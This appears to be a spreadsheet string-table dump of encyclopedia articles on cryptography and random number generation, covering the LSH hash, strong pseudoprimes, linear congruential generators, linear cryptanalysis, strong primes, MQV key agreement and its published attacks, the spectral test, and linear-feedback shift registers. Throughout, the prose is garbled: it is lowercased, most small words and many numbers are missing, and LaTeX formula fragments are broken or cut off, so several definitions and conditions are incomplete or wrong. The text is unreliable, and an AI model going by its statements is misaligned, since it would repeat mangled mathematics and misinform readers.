{\textsf {h}}_{\textsf {b}}=(h_{b}[0],\ldots ,h_{b}[w-1])} {\displaystyle -byte variable, finalization function {\displaystyle {\textrm {fin}}_{n}} performs following procedure. {\displaystyle h[l]\leftarrow cv^{(t)}[l]\oplus cv^{(t)}[l+8]} {\displaystyle (0\leq l\leq {\displaystyle h_{b}[s]\leftarrow h[\lfloor 8s/w\rfloor ]_{[7:0]}^{\ggg (8s\mod w)}} {\displaystyle (0\leq s\leq (w-1))} {\displaystyle h\leftarrow (h_{b}[0]\|\ldots \|h_{b}[w-1])_{[0:n-1]}} here, {\displaystyle x_{[i:j]}} denotes {\displaystyle x_{i}\|x_{i-1}\|\ldots \|x_{j}} sub-bit string word {\displaystyle {\displaystyle i\geq {\displaystyle x_{[i:j]}} denotes {\displaystyle x_{i}\|x_{i+1}\|\ldots \|x_{j}} sub-bit string {\displaystyle -bit string {\displaystyle x=x_{0}\|x_{1}\|\ldots \|x_{l-1}} {\displaystyle i\leq security secure known attacks hash functions now. collision-resistant {\displaystyle q&lt;2^{n/2}} preimage-resistant second-preimage-resistant {\displaystyle q&lt;2^{n}} ideal cipher model, {\displaystyle number queries structure. lsh-256 secure existing hash function attacks number steps more, lsh-512 secure number steps more. note steps work security margin compression function. performance outperforms sha-2/3 various software platforms. following table shows speed performance message hashing several platforms. following table comparison platform based haswell, measured intel core i7-4770k quad core platform, others measured intel core i5-4570s quad core platform. following table measured samsung exynos 5250 cortex-a15 dual core platform. test vectors test vectors digest length follows. values expressed hexadecimal form. lsh-256-224("abc") lsh-256-256("abc") lsh-512-224("abc") lsh-512-256("abc") lsh-512-384("abc") lsh-512-512("abc") implementations free public private, commercial non-commercial. source code distribution implemented java, python downloaded kisa's cryptography activation webpage. kcmvp cryptographic algorithms approved korean cryptographic module validation program (kcmvp). standardization included following standard. 3262, hash function korean) references</t>
  </si>
  <si>
    <t>Strong pseudoprime</t>
  </si>
  <si>
    <t>strong pseudoprime composite number passes miller–rabin primality test. prime numbers pass test, small fraction composites also pass, making "pseudoprimes". unlike fermat pseudoprimes, exist numbers pseudoprimes coprime bases (the carmichael numbers), composites strong pseudoprimes bases. motivation first examples want investigate 31697 probable prime (prp). pick base and, inspired fermat's little theorem, calculate: 31696 31697 {\displaystyle 3^{31696}\equiv 1{\pmod {31697}}} this shows 31697 fermat (base suspect prime. repeatedly halve exponent: 15848 31697 {\displaystyle 3^{15848}\equiv 1{\pmod {31697}}} 7924 31697 {\displaystyle 3^{7924}\equiv 1{\pmod {31697}}} 3962 28419 31697 {\displaystyle 3^{3962}\equiv 28419{\pmod {31697}}} first couple times yield anything interesting (the result still modulo 31697), exponent 3962 result neither minus (i.e. 31696) modulo 31697. this proves 31697 fact composite equals 29×1093). modulo prime, residue square roots minus this shows 31697 strong pseudoprime base another example, pick 47197 calculate manner: 47196 47197 {\displaystyle 3^{47196}\equiv 1{\pmod {47197}}} 23598 47197 {\displaystyle 3^{23598}\equiv 1{\pmod {47197}}} 11799 47197 {\displaystyle 3^{11799}\equiv 1{\pmod {47197}}} case, result continues (mod 47197) reach exponent. situation, 47197 strong probable prime base because turns fact composite (can seen picking bases 47197 strong pseudoprime base finally, consider 74593 get: 74592 74593 {\displaystyle 3^{74592}\equiv 1{\pmod {74593}}} 37296 74593 {\displaystyle 3^{37296}\equiv 1{\pmod {74593}}} 18648 74592 74593 {\displaystyle 3^{18648}\equiv 74592{\pmod {74593}}} here, reach minus modulo 74593, situation perfectly possible prime. when occurs, stop calculation (even though exponent yet) 74593 strong probable prime (and, turns out, strong pseudoprime) base formal definition composite number called strong (fermat) pseudoprime base {\displaystyle a^{d}\equiv 1{\pmod {n}}} {\displaystyle a^{d\cdot 2^{r}}\equiv -1{\pmod {n}}\quad {\mbox{ }}0\leq r&lt;s.} number satisfies conditions know whether prime, precise refer strong probable prime base know prime, term strong pseudoprime.) definition trivially (mod trivial bases often excluded. mistakenly gives definition first condition, satisfied primes. properties strong pseudoprimes strong pseudoprime base always euler–jacobi pseudoprime, euler pseudoprime fermat pseudoprime base, euler fermat pseudoprimes strong pseudoprimes. carmichael numbers strong pseudoprimes bases—for example, strong pseudoprime base 50—but bases. composite number strong pseudoprime quarter bases thus, "strong carmichael numbers", numbers strong pseudoprimes bases. thus given random base, probability number strong pseudoprime base less 1/4, forming basis widely used miller–rabin primality test. true probability failure generally vastly smaller. paul erdos carl pomerance showed 1986 random integer passes miller–rabin primality test random base almost surely prime. example, first 25,000,000,000 positive integers, 1,091,987,405 integers probable primes base 21,853 pseudoprimes, even fewer strong pseudoprimes, latter subset former. however, arnault gives 397-digit carmichael number strong pseudoprime every base less 307. reduce chance number wrongfully declared probably prime combine strong probable prime test lucas probable prime test, baillie–psw primality test. there infinitely many strong pseudoprimes base. examples first strong pseudoprimes base 2047, 3277, 4033, 4681, 8321, 15841, 29341, 42799, 49141, 52633, 65281, 74665, 80581, 85489, 88357, 90751, (sequence a001262 oeis).the first base 121, 703, 1891, 3281, 8401, 8911, 10585, 12403, 16531, 18721, 19345, 23521, 31621, 44287, 47197, 55969, 63139, 74593, 79003, 82513, 87913, 88573, 97567, (sequence a020229 oeis).the first base 781, 1541, 5461, 5611, 7813, 13021, 14981, 15751, 24211, 25351, 29539, 38081, 40501, 44801, 53971, 79381, (sequence a020231 oeis).for base oeis: a020230, base 100, oeis: a020232 oeis: a020326. testing conditions several bases, gets somewhat powerful primality tests using base alone. example, numbers less 25·109 strong pseudoprimes bases simultaneously. they listed table smallest number 25326001. this means that, less 25326001 strong probable prime bases prime. carrying further, 3825123056546413051 smallest number strong pseudoprime bases less 3825123056546413051 strong probable prime bases, prime. judicious choice bases necessarily prime, even better tests constructed. example, composite {\displaystyle &lt;2^{64}} strong pseudoprime seven bases 325, 9375, 28178, 450775, 9780504, 1795265022. smallest strong pseudoprime base references</t>
  </si>
  <si>
    <t>Linear congruential generator</t>
  </si>
  <si>
    <t>linear congruential generator (lcg) algorithm yields sequence pseudo-randomized numbers calculated discontinuous piecewise linear equation. method represents oldest best-known pseudorandom number generator algorithms. theory behind relatively easy understand, easily implemented fast, especially computer hardware provide modular arithmetic storage-bit truncation. generator defined recurrence relation: {\displaystyle x_{n+1}=\left(ax_{n}+c\right){\bmod {m}}} {\displaystyle sequence pseudo-random values, {\displaystyle m,\,0&lt;m} "modulus" {\displaystyle a,\,0&lt;a&lt;m} "multiplier" {\displaystyle c,\,0\leq c&lt;m} "increment" {\displaystyle x_{0},\,0\leq x_{0}&lt;m} "seed" "start value"are integer constants specify generator. generator often called multiplicative congruential generator (mcg), lehmer rng. method called mixed congruential generator.: when mathematician would call recurrence affine transformation, linear one, misnomer well-established computer science.: history lehmer generator published 1951 linear congruential generator published 1958 thomson rotenberg. period length benefit lcgs appropriate choice parameters, results period known long. although criterion, short period fatal flaw pseudorandom number generator.while lcgs capable producing pseudorandom numbers pass formal tests randomness, quality output extremely sensitive choice parameters example, produces simple modulo-m counter, long period, obviously non-random. historically, poor choices ineffective implementations lcgs. particularly illustrative example randu, widely used early 1970s many results currently questioned poor lcg.there three common families parameter choice: prime, this original lehmer construction. period multiplier chosen primitive element integers modulo initial state must chosen m−1. disadvantage prime modulus modular reduction requires double-width product explicit reduction step. often prime less power used (the mersenne primes 231−1 261−1 popular), reduction modulo computed ⌊ax/2e⌋. this must followed conditional subtraction result large, number subtractions limited ad/m, easily limited small. double-width product unavailable, multiplier chosen carefully, schrage's method used. this, factor qa+r, i.e. ⌊m/a⌋ then compute r⌊x/q⌋. since m/a, first term strictly less am/a chosen (and thus second term also less r⌊x/q⌋ rx/q x(r/q) thus, products computed single-width product, difference lies range [1−m, m−1], reduced m−1] single conditional add.a second disadvantage awkward convert value uniform random bits. prime less power used, sometimes missing values simply ignored. power choosing power often 264, produces particularly efficient lcg, allows modulus operation computed simply truncating binary representation. fact, significant bits usually computed all. there are, however, disadvantages. this form maximal period m/4, achieved (mod initial state must odd, three bits alternate states useful. shown form equivalent generator modulus quarter size serious issue power-of-two modulus bits shorter period high bits. lowest-order never changes always odd), next bits alternate states. (mod never changes alternates. (mod never changes alternates.) repeats period period only significant achieves full period. when correctly chosen parameters allow period equal seed values. this occur if:: 17—19 {\displaystyle {\displaystyle relatively prime, {\displaystyle a-1} divisible prime factors {\displaystyle {\displaystyle a-1} divisible {\displaystyle divisible 4.these three requirements referred hull–dobell theorem.this form used works well many repeated prime factors, power using computer's word size common choice. square-free integer, would allow (mod makes poor prng; selection possible full-period multipliers available repeated prime factors. although hull–dobell theorem provides maximum period, sufficient guarantee good generator. example, desirable divisible prime factors necessary. thus, power divisible divisible i.e. (mod 8).: §3.2.1.3 indeed, multipliers produce sequence fails test non-randomness another, finding multiplier satisfactory applicable criteria: §3.3.3 quite challenging. spectral test important tests.note power-of-2 modulus shares problem described bits form generator modulus thus repeat period significant achieves full period. pseudorandom number less desired, ⌊rx/m⌋ much higher-quality result unfortunately, programming languages make latter much easier write commonly used form. generator sensitive choice long relatively prime modulus (e.g. power must odd), value commonly chosen. series produced choices written simple function series c=1.: specifically, prototypical series defined yn+1 ayn+1 general series xn+1 axn+c written affine function {\displaystyle x_{n}=(x_{0}(a-1)+c)y_{n}+x_{0}=(x_{1}-x_{0})y_{n}+x_{0}{\pmod {m}}.} more generally, series multiplier modulus related {\displaystyle {x_{n}-x_{0} \over x_{1}-x_{0}}=y_{n}={a^{n}-1 \over a-1}={z_{n}-z_{0} \over z_{1}-z_{0}}{\pmod {m}}.} parameters common following table lists parameters lcgs common use, including built-in rand() functions runtime libraries various compilers. this table show popularity, examples emulate; many parameters poor. tables good parameters available. shown above, lcgs always bits values produce. example, java implementation operates 48-bit values iteration returns significant bits. this higher-order bits longer periods lower-order bits (see below). lcgs truncation technique produce statistically better values not. this especially noticeable scripts operation reduce range; modifying random number lead alternating without truncation. advantages disadvantages lcgs fast require minimal memory (one modulo-m number, often bits) retain state. this makes valuable simulating multiple independent streams. lcgs intended, must used, cryptographic applications; cryptographically secure pseudorandom number generator applications. although lcgs specific weaknesses, many flaws come small state. fact people lulled many years using small moduli seen testament strength technique. large enough state pass even stringent statistical tests; modulo-2 returns high bits passes testu01's smallcrush suite, 96-bit passes stringent bigcrush suite.for specific example, ideal random number generator bits output expected birthday theorem) begin duplicating earlier outputs results. prng whose output full, untruncated state produce duplicates full period elapses, easily detectable statistical flaw. related reasons, prng period longer square number outputs required. given modern computer speeds, means period least demanding applications, longer demanding simulations. flaw specific lcgs that, used choose points n-dimensional space, points most, n√n!⋅m hyperplanes (marsaglia's theorem, developed george marsaglia). this serial correlation successive values sequence carelessly chosen multipliers usually fewer, widely spaced planes, lead problems. spectral test, simple test lcg's quality, measures spacing allows good multiplier chosen. plane spacing depends modulus multiplier. large enough modulus reduce distance resolution double precision numbers. choice multiplier becomes less important modulus large. still necessary calculate spectral index make sure multiplier one, purely probabilistically becomes extremely unlikely encounter multiplier modulus larger 264. another flaw specific lcgs short period low-order bits chosen power this mitigated using modulus larger required output, using significant bits state. nevertheless, applications lcgs good option. instance, embedded system, amount memory available often severely limited. similarly, environment video game console taking small number high-order bits well suffice. (the low-order bits lcgs power never relied degree randomness whatsoever.) order bits short cycles. particular, full-cycle lcg, power produce alternately even results. lcgs evaluated carefully suitability non-cryptographic applications high-quality randomness critical. monte carlo simulations, must modulus greater preferably much greater cube number random samples required. this means, example, (good) 32-bit used obtain thousand random numbers; 64-bit good random samples little million), etc. reason, practice lcgs suitable large-scale monte carlo simulations. sample code python code following implementation python, form generator: free pascal free pascal uses mersenne twister default pseudo random number generator whereas delphi uses lcg. here delphi compatible example free pascal based information table above. given randseed value generates sequence random numbers delphi. like pseudorandom number generators, needs store state alter time generates number. multiple threads access state simultaneously causing race condition. implementations different state unique initialization different threads avoid equal sequences random numbers simultaneously executing threads. derivatives there several generators linear congruential generators different form, thus techniques used analyze lcgs applied them. method producing longer period outputs several lcgs different periods large least common multiple; wichmann–hill generator example form. would prefer completely coprime, prime modulus implies even period, must common factor least.) this shown equivalent single modulus equal product component moduli. marsaglia's add-with-carry subtract-with-borrow prngs word size b=2w lags equivalent lcgs modulus 1.multiply-with-carry prngs multiplier equivalent lcgs large prime modulus abr−1 power-of-2 multiplier permuted congruential generator begins power-of-2-modulus applies output transformation eliminate short period problem low-order bits. comparison prngs widely used primitive obtaining long-period pseudorandom sequences linear-feedback shift register construction, based arithmetic gf(2)[x], polynomial ring gf(2). rather integer addition multiplication, basic operations exclusive-or carry-less multiplication, usually implemented sequence logical shifts. these advantage bits full-period; suffer weakness low-order bits plagues arithmetic modulo 2k.examples family include xorshift generators mersenne twister. latter provides long period (219937−1) variate uniformity, fails statistical tests. lagged fibonacci generators also fall category; although arithmetic addition, period ensured lfsr among least-significant bits. easy detect structure linear-feedback shift register appropriate tests linear complexity test implemented testu01 suite; boolean circulant matrix initialized consecutive bits lfsr never rank greater degree polynomial. adding non-linear output mixing function xoshiro256** permuted congruential generator constructions) greatly improve performance statistical tests. another structure prng simple recurrence function combined powerful output mixing function. this includes counter mode block ciphers non-cryptographic generators splitmix64. structure similar lcgs, equivalent, multiple-recursive generator: (a1xn−1 a2xn−2 akxn−k) with prime modulus, generate periods mk−1, useful extension structure larger periods. powerful technique generating high-quality pseudorandom numbers combine prngs different structure; lfsr kiss xorwow constructions) well cost speed. also list random number generators prngs including better statistical qualitites acorn generator confused term appears used variants lfsr generators permuted congruential generator full cycle inversive congruential generator multiply-with-carry lehmer (sometimes called park–miller rng) combined linear congruential generator notes references press, teukolsky, vetterling, flannery, (2007), "section 7.1.1. some history", numerical recipes: scientific computing (3rd ed.), york: cambridge university press, isbn 978-0-521-88068-8 gentle, james (2003). random number generation monte carlo methods, edition, springer, isbn 0-387-00178-6. joan boyar (1989). "inferring sequences produced pseudo-random number generators" (pdf). journal acm. (1): 129–141. doi:10.1145/58562.59305. s2cid 3565772. paper, efficient algorithms given inferring sequences produced certain pseudo-random number generators). external links simulation linear congruential generator visualizes correlations pseudo-random numbers manipulating parameters. security random number generation: annotated bibliography linear congruential generators post sci.math "death art" computer project goldstein technologies llc, uses generate 33,554,432 images l'ecuyer simard, "testu01: library empirical testing random number generators", 2006, revised november 2006, transactions mathematical software, article august 2007. article another cracking</t>
  </si>
  <si>
    <t>Linear cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, linear cryptanalysis general form cryptanalysis based finding affine approximations action cipher. attacks developed block ciphers stream ciphers. linear cryptanalysis widely used attacks block ciphers; differential cryptanalysis. discovery attributed mitsuru matsui, first applied technique feal cipher (matsui yamagishi, 1992). subsequently, matsui published attack data encryption standard (des), eventually leading first experimental cryptanalysis cipher reported open community (matsui, 1993; 1994). attack generally practical, requiring known plaintexts.a variety refinements attack suggested, including using multiple linear approximations incorporating non-linear expressions, leading generalized partitioning cryptanalysis. evidence security linear cryptanalysis usually expected cipher designs. overview there parts linear cryptanalysis. first construct linear equations relating plaintext, ciphertext bits high bias; whose probabilities holding (over space possible values variables) close possible second linear equations conjunction known plaintext-ciphertext pairs derive bits. constructing linear equations purposes linear cryptanalysis, linear equation expresses equality expressions consist binary variables combined exclusive-or (xor) operation. example, following equation, hypothetical cipher, states first third plaintext bits block cipher's block) first ciphertext equal second key: {\displaystyle p_{1}\oplus p_{3}\oplus c_{1}=k_{2}.} ideal cipher, linear equation relating plaintext, ciphertext bits would hold probability 1/2. since equations dealt linear cryptanalysis vary probability, accurately referred linear approximations. procedure constructing approximations different cipher. basic type block cipher, substitution–permutation network, analysis concentrated primarily s-boxes, nonlinear part cipher (i.e. operation s-box cannot encoded linear equation). small enough s-boxes, possible enumerate every possible linear equation relating s-box's input output bits, calculate biases choose best ones. linear approximations s-boxes must combined cipher's actions, permutation mixing, arrive linear approximations entire cipher. piling-up lemma useful tool combination step. there also techniques iteratively improving linear approximations (matsui 1994). deriving bits having obtained linear approximation form: {\displaystyle p_{i_{1}}\oplus p_{i_{2}}\oplus \cdots \oplus c_{j_{1}}\oplus c_{j_{2}}\oplus \cdots =k_{k_{1}}\oplus k_{k_{2}}\oplus \cdots apply straightforward algorithm (matsui's algorithm using known plaintext-ciphertext pairs, guess values bits involved approximation. values bits right-hand side (referred partial key), count many times approximation holds true known plaintext-ciphertext pairs; call count partial whose greatest absolute difference half number plaintext-ciphertext pairs designated likely values bits. this assumed correct partial cause approximation hold high bias. magnitude bias significant here, opposed magnitude probability itself. this procedure repeated linear approximations, obtaining guesses values bits, number unknown bits enough attacked brute force. also piling-up lemma differential cryptanalysis references external links linear cryptanalysis tutorial linear differential cryptanalysis linear cryptanalysis demo tutorial linear (and differential) cryptanalysis block ciphers "improving time complexity matsui's linear cryptanalysis", improves complexity thanks fast fourier transform</t>
  </si>
  <si>
    <t>Strong prime</t>
  </si>
  <si>
    <t>mathematics, strong prime prime number certain special properties. definitions strong primes different cryptography number theory. definition number theory number theory, strong prime prime number greater arithmetic mean nearest prime words, closer following preceding prime). algebraically, writing sequence prime numbers (p1, ...) ...), strong prime 1/2. example, seventh prime: sixth eighth primes, half greater strong prime. first strong primes 101, 107, 127, 137, 149, 163, 179, 191, 197, 223, 227, 239, 251, 269, 277, 281, 307, 311, 331, 347, 367, 379, 397, 419, 431, 439, 457, 461, 479, 487, (sequence a051634 oeis).in twin prime pair always strong prime, since must divide cannot prime. definition cryptography cryptography, prime number said "strong" following conditions satisfied. sufficiently large useful cryptography; typically requires large plausible computational resources enable cryptanalyst factorise products strong primes. large prime factors. that a1q1 integer large prime large prime factors. that a2q2 integer large prime large prime factors. that a3q3 integer large prime possible prime strong prime cryptographic sense number theoretic sense. sake illustration, 439351292910452432574786963588089477522344331 strong prime number theoretic sense arithmetic mean neighboring primes less. without computer, number would strong prime cryptographic sense 439351292910452432574786963588089477522344330 large prime factor 1747822896920092227343 (and turn number less large prime factor 1683837087591611009), 439351292910452432574786963588089477522344332 large prime factor 864608136454559457049 (and turn number less large prime factor 105646155480762397). even using algorithms advanced trial division, numbers would difficult factor hand. modern computer algebra system, numbers factored almost instantaneously. cryptographically strong prime much larger example. application strong primes cryptography factoring-based cryptosystems some people suggest generation process cryptosystems, modulus chosen product strong primes. this makes factorization using pollard's algorithm computationally infeasible. reason, strong primes required ansi x9.31 standard generating keys digital signatures. however, strong primes protect modulus factorisation using newer algorithms lenstra elliptic curve factorization number field sieve algorithm. given additional cost generating strong primes security currently recommend generation. similar (and technical) argument also given rivest silverman. discrete-logarithm-based cryptosystems shown stephen pohlig martin hellman 1978 factors less logc problem solving discrete logarithm modulo therefore, cryptosystems based discrete logarithm, dsa, required least large prime factor. miscellaneous facts computationally large safe prime likely cryptographically strong prime. note criteria determining pseudoprime strong pseudoprime congruences powers base, inequality arithmetic mean neighboring pseudoprimes. when prime equal mean neighboring primes, called balanced prime. when less, called weak prime (not confused weakly prime number). references external links guide cryptography standards 3.1.4 what strong primes necessary system? lab's explanation strong weak primes</t>
  </si>
  <si>
    <t>MQV</t>
  </si>
  <si>
    <t>(menezes–qu–vanstone) authenticated protocol agreement based diffie–hellman scheme. like authenticated diffie–hellman schemes, provides protection active attacker. protocol modified work arbitrary finite group, and, particular, elliptic curve groups, known elliptic curve (ecmqv). initially proposed alfred menezes, minghua scott vanstone 1995. later modified joint work laurie jerry solinas. there one-, two- three-pass variants. incorporated public-key standard ieee p1363 nist's sp800-56a standard.some variants claimed patents assigned certicom. ecmqv dropped national security agency's suite cryptographic standards. description alice pair {\displaystyle (a,a)} {\displaystyle public {\displaystyle private pair {\displaystyle (b,b)} {\displaystyle public {\displaystyle private key. following {\displaystyle {\bar {r}}} following meaning. {\displaystyle r=(x,y)} point elliptic curve. then {\displaystyle {\bar {r}}=(x\,{\bmod {\,}}2^{l})+2^{l}} {\displaystyle l=\left\lceil {\frac {\lfloor \log _{2}n\rfloor +1}{2}}\right\rceil {\displaystyle order used generator point {\displaystyle {\displaystyle {\bar {r}}} first bits first coordinate {\displaystyle note: algorithm secure checks performed. hankerson correctness calculates: {\displaystyle k=h\cdot s_{b}(x+{\bar {x}}a)=h\cdot s_{b}(xp+{\bar {x}}ap)=h\cdot s_{b}(x+{\bar {x}}a)p=h\cdot s_{b}s_{a}p} alice calculates: {\displaystyle k=h\cdot s_{a}(y+{\bar {y}}b)=h\cdot s_{a}(yp+{\bar {y}}bp)=h\cdot s_{a}(y+{\bar {y}}b)p=h\cdot s_{b}s_{a}p} shared secrets {\displaystyle indeed {\displaystyle k=h\cdot s_{b}s_{a}p} hmqv original protocol include user identities communicating parties exchange flows. user identities included subsequent explicit confirmation process. however, explicit confirmation optional (and ieee p1363 specification). 2001, kaliski presented unknown key-share attack exploited missing identities exchange protocol. attack works implicitly authenticated explicit confirmation. attack, user establishes session another user tricked believing shares different user. 2006, menezes ustaoglu proposed address attack including user identities derivation function exchange. explicit confirmation process remains optional. 2005, krawczyk proposed hash variant mqv, called hmqv. hmqv protocol designed address kaliski's attack (without mandating explicit confirmation), additional goals achieving provable security better efficiency. hmqv made three changes mqv: including user identities exchange flows: specifically, letting {\displaystyle {\bar {x}}=h(x,b)} {\displaystyle {\bar {y}}=h(y,a)} {\displaystyle {\displaystyle identities alice respectively. removing mandatory requirement certificate authority (ca) must verify proof-of-possession user's private public registration. hmqv, merely needs check submitted public removing mandatory requirement user must verify whether received ephemeral public valid public (known public validation). hmqv, user merely needs check received ephemeral public 1.hmqv claims superior performance dispenses operations above, mandatory mqv. hmqv paper provides "formal security proofs" support dispensing operations safe. 2005, menezes first presented small subgroup confinement attack hmqv. this attack exploits exact missing public validations shows engaged active attacker, hmqv protocol leaks information user's long-term private key, depending underlying cryptographic group setting, entire private recovered attacker. menezes proposed address attack least mandating public validations 2006, response menezes's attack, krawczyk revised hmqv submission ieee p1363 (included ieee p1363 d1-pre draft). however, instead validating long-term ephemeral public keys respectively separate operations, krawczyk proposed validate together combined operation exchange process. this would save cost. with combined public validation place, menezes's attack would prevented. revised hmqv could still claim efficient mqv. 2010, presented attacks revised hmqv specified ieee p1363 d1-pre draft). first attack exploits fact hmqv allows data string registered long-term public key. hence, small subgroup element allowed registered "public key". with knowledge "public key", user able pass verification steps hmqv fully "authenticated" end. this contradicts common understanding "authentication" authenticated exchange protocol defined based proving knowledge private key. case, user "authenticated" without private fact, private exist). this issue applicable mqv. second attack exploits self-communication mode, explicitly supported hmqv allow user communicate using public certificate. mode, hmqv shown vulnerable unknown key-share attack. address first attack, proposed perform public validations separately, initially suggested menezes. however, change would diminish efficiency advantages hmqv mqv. address second attack, proposed include additional identities distinguish copies self, disable self-communication mode. hao's attacks discussed members ieee p1363 working group 2010. however, consensus hmqv revised. result, hmqv specification ieee p1363 d1-pre draft unchanged, standardisation hmqv ieee p1363 stopped progressing since. also elliptic curve cryptography references bibliography kaliski, (2001). unknown key-share attack agreement protocol". transactions information system security. (3): 275–288. doi:10.1145/501978.501981. s2cid 15388065. law, menezes, solinas, vanstone, (2003). efficient protocol authenticated agreement". des. codes cryptography. (2): 119–134. doi:10.1023/a:1022595222606. s2cid 27921095. leadbitter, smart, (2003). "analysis insecurity ecmqv partially known nonces". information security. international conference, 2003, bristol, october 1–3, 2003. proceedings. lecture notes computer science. vol. 2851. 240–251. doi:10.1007/10958513_19. isbn 978-3-540-20176-2. menezes, alfred minghua; vanstone, scott (2005). some agreement protocols providing implicit authentication (pdf). workshop selected areas cryptography (sac '95). ottawa, canada. 22–32. hankerson, vanstone, menezes, (2004). guide elliptic curve cryptography. springer professional computing. york: springer. citeseerx 10.1.1.331.1248. doi:10.1007/b97644. isbn 978-0-387-95273-4. s2cid 720546. external links hmqv: high-performance secure diffie–hellman protocol hugo krawczyk another look hmqv efficient protocol authenticated agreement hmqv ieee p1363 (power point)</t>
  </si>
  <si>
    <t>Spectral test</t>
  </si>
  <si>
    <t>spectral test statistical test quality class pseudorandom number generators (prngs), linear congruential generators (lcgs). lcgs property plotted dimensions, lines hyperplanes form, possible outputs found. spectral test compares distance planes; apart are, worse generator test devised study lattice structures lcgs, applied families prngs. according donald knuth, powerful test known, fail lcgs pass statistical tests. subroutine randu fails test dimensions above. references</t>
  </si>
  <si>
    <t>Linear-feedback shift register</t>
  </si>
  <si>
    <t>computing, linear-feedback shift register (lfsr) shift register whose input linear function previous state. commonly used linear function single bits exclusive-or (xor). thus, lfsr often shift register whose input driven bits overall shift register value. initial value lfsr called seed, operation register deterministic, stream values produced register completely determined current previous) state. likewise, register finite number possible states, must eventually enter repeating cycle. however, lfsr well-chosen feedback function produce sequence bits appears random long cycle. applications lfsrs include generating pseudo-random numbers, pseudo-noise sequences, fast digital counters, whitening sequences. both hardware software implementations lfsrs common. mathematics cyclic redundancy check, used provide quick check transmission errors, closely related lfsr. general, arithmetics behind lfsrs makes elegant object study implement. produce relatively complex logics simple building blocks. however, methods, less elegant perform better, considered well. fibonacci lfsrs positions affect next state called taps. diagram taps [16,14,13,11]. rightmost lfsr called output bit. taps xor'd sequentially output back leftmost bit. sequence bits rightmost position called output stream. bits lfsr state influence input called taps. maximum-length lfsr produces m-sequence (i.e., cycles possible states within shift register except state bits zero), unless contains zeros, case never change. alternative xor-based feedback lfsr, also xnor. this function affine map, strictly linear map, results equivalent polynomial counter whose state complement state lfsr. state ones illegal using xnor feedback, state zeroes illegal using xor. this state considered illegal counter would remain "locked-up" state. this method advantageous hardware lfsrs using flip-flops start zero state, start lockup state, meaning register need seeded order begin operation.the sequence numbers generated lfsr xnor counterpart considered binary numeral system valid gray code natural binary code. arrangement taps feedback lfsr expressed finite field arithmetic polynomial this means coefficients polynomial must this called feedback polynomial reciprocal characteristic polynomial. example, taps 16th, 14th, 13th 11th bits shown), feedback polynomial {\displaystyle x^{16}+x^{14}+x^{13}+x^{11}+1.} "one" polynomial correspond corresponds input first (i.e. equivalent powers terms represent tapped bits, counting left. first last bits always connected input output respectively. lfsr maximal-length corresponding feedback polynomial primitive. this means following conditions necessary (but sufficient): number taps even. taps setwise co-prime; i.e., must divisor common taps.tables primitive polynomials maximum-length lfsrs constructed given references. there maximum-length sequence given lfsr length. also, maximum-length sequence found, another automatically follows. sequence n-bit lfsr corresponds term, corresponding "mirror" sequence sequence [32, counterpart [32, both give maximum-length sequence. example below: fast parity popcount operation available, feedback computed efficiently product register characteristic polynomial: parity(lfsr 0x002du);, equivalently popcnt(lfsr 0x002du) */;. (the turns popcnt true parity function, bitshift later makes higher bits irrelevant.)if rotation operation available, state computed lfsr rotateright((lfsr ~1u) (bit 1u), 1);, equivalently lfsr rotateright(((bit lfsr) lfsr, 1);this lfsr configuration also known standard, many-to-one external gates. alternative galois configuration described next section. example python sample python implementation similar taps [16,15,13,4]) fibonacci lfsr would where register bits used fourth, 13th, 15th sixteenth establishes maximum sequence length. galois lfsrs named french mathematician évariste galois, lfsr galois configuration, also known modular, internal xors, one-to-many lfsr, alternate structure generate output stream conventional lfsr (but offset time). galois configuration, system clocked, bits taps shifted position right unchanged. taps, hand, xored output stored next position. output next input bit. effect output zero, bits register shift right unchanged, input becomes zero. when output one, bits positions flip become become entire register shifted right input becomes generate output stream, order taps counterpart (see above) order conventional lfsr, otherwise stream reverse. note internal state lfsr necessarily same. galois register shown output stream fibonacci register first section. time offset exists streams, different startpoint needed output cycle. galois lfsrs concatenate every produce input (the xoring done within lfsr, gates serial, therefore propagation times reduced rather whole chain), thus possible computed parallel, increasing speed execution. software implementation lfsr, galois form efficient, operations implemented word time: output must examined individually.below code example 16-bit maximal-period galois lfsr example figure: branch (lsb) lfsr 0xb400u;can also written lfsr (-lsb) 0xb400u; produce efficient code compilers. addition, left-shifting variant produce even better code, carry addition lfsr itself. non-binary galois lfsr binary galois lfsrs like ones shown generalized q-ary alphabet ..., (e.g., binary, alphabet simply 1}). case, exclusive-or component generalized addition modulo-q (note addition modulo feedback (output bit) multiplied (modulo-q) q-ary value, constant specific point. note also generalization binary case, feedback multiplied either feedback, i.e., tap) (feedback present). given appropriate configuration, lfsrs used generate galois fields arbitrary prime values xorshift lfsrs shown george marsaglia analysed richard brent, linear feedback shift registers implemented using shift operations. this approach lends fast execution software operations typically efficiently modern processor instructions. below code example 16-bit maximal-period xorshift lfsr using 7,9,13 triplet john metcalf: matrix forms binary lfsrs fibonacci galois configurations expressed linear functions using matrices {\displaystyle \mathbb _{2}} (see gf(2)). using companion matrix characteristic polynomial lfsr denoting seed column vector {\displaystyle (a_{0},a_{1},\dots ,a_{n-1})^{\mathrm state register fibonacci configuration {\displaystyle steps given {\displaystyle {\begin{pmatrix}a_{k}\\a_{k+1}\\a_{k+2}\\\vdots \\a_{k+n-1}\end{pmatrix}}={\begin{pmatrix}0&amp;1&amp;0&amp;\cdots &amp;0\\0&amp;0&amp;1&amp;\ddots &amp;\vdots \\\vdots &amp;\vdots &amp;\ddots &amp;\ddots &amp;0\\0&amp;0&amp;\cdots &amp;0&amp;1\\c_{0}&amp;c_{1}&amp;\cdots &amp;\cdots &amp;c_{n-1}\end{pmatrix}}{\begin{pmatrix}a_{k-1}\\a_{k}\\a_{k+1}\\\vdots \\a_{k+n-2}\end{pmatrix}}={\begin{pmatrix}0&amp;1&amp;0&amp;\cdots &amp;0\\0&amp;0&amp;1&amp;\ddots &amp;\vdots \\\vdots &amp;\vdots &amp;\ddots &amp;\ddots &amp;0\\0&amp;0&amp;\cdots &amp;0&amp;1\\c_{0}&amp;c_{1}&amp;\cdots &amp;\cdots &amp;c_{n-1}\end{pmatrix}}^{k}{\begin{pmatrix}a_{0}\\a_{1}\\a_{2}\\\vdots \\a_{n-1}\end{pmatrix}}} matrix corresponding galois form {\displaystyle {\begin{pmatrix}c_{0}&amp;1&amp;0&amp;\cdots &amp;0\\c_{1}&amp;0&amp;1&amp;\ddots &amp;\vdots \\\vdots &amp;\vdots &amp;\ddots &amp;\ddots &amp;0\\c_{n-2}&amp;0&amp;\cdots 